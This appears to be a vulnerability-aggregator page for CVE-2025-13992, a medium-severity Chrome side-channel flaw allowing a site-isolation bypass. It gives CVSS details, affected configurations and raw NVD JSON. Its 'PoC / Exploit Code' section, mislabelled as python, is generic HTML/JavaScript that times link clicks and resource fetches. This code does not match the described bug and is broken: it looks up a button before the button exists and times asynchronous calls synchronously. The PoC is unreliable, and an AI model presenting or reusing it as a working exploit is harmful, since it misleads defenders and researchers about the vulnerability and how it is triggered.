Security Vulnerability Report
中文
CVE-2025-13992 CVSS 4.7 MEDIUM

CVE-2025-13992

Published: 2025-12-03 19:15:55
Last Modified: 2025-12-05 14:52:23
Source: [email protected]

Description

Side-channel information leakage in Navigation and Loading in Google Chrome prior to 139.0.7258.66 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 139.0.7258.66

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13992 PoC - Side-channel Information Leakage in Navigation/Loading --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13992 PoC</title> </head> <body> <h1>Side-channel Information Leakage PoC</h1> <p>This PoC demonstrates timing-based side-channel attack via Navigation/Loading.</p> <script> // Measure navigation timing to detect site isolation bypass function measureNavigationTiming() { const results = []; // Test 1: Measure link click timing const testLinks = ['https://example.com', 'https://test.com']; testLinks.forEach(url => { const start = performance.now(); // Attempt to detect navigation behavior const link = document.createElement('a'); link.href = url; link.click(); const end = performance.now(); results.push({ url: url, timing: end - start, difference: end - start }); }); // Test 2: Resource loading timing analysis const resources = ['/favicon.ico', '/robots.txt', '/sitemap.xml']; resources.forEach(resource => { const start = performance.now(); fetch(resource).catch(() => {}); const end = performance.now(); results.push({ resource: resource, timing: end - start, cacheBehavior: end - start < 5 ? 'cached' : 'not_cached' }); }); // Test 3: Navigation event timing window.addEventListener('load', () => { const navTiming = performance.getEntriesByType('navigation')[0]; if (navTiming) { results.push({ type: 'navigation_timing', domContentLoaded: navTiming.domContentLoadedEventEnd - navTiming.domContentLoadedEventStart, loadComplete: navTiming.loadEventEnd - navTiming.loadEventStart }); } }); console.log('Timing Results:', JSON.stringify(results, null, 2)); return results; } // Execute timing measurements document.getElementById('testBtn').addEventListener('click', () => { const results = measureNavigationTiming(); document.getElementById('results').innerText = JSON.stringify(results, null, 2); }); </script> <button id='testBtn'>Run Timing Test</button> <pre id='results'></pre> <p><strong>Note:</strong> This PoC measures timing differences that could leak information about user's browsing patterns.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13992", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:55.437", "lastModified": "2025-12-05T14:52:23.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Side-channel information leakage in Navigation and Loading in Google Chrome prior to 139.0.7258.66 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1300"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "139.0.7258.66", "matchCriteriaId": "E1314715-5C08-4DEB-B6A1-BDCAD237E99D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/08/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/40095391", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.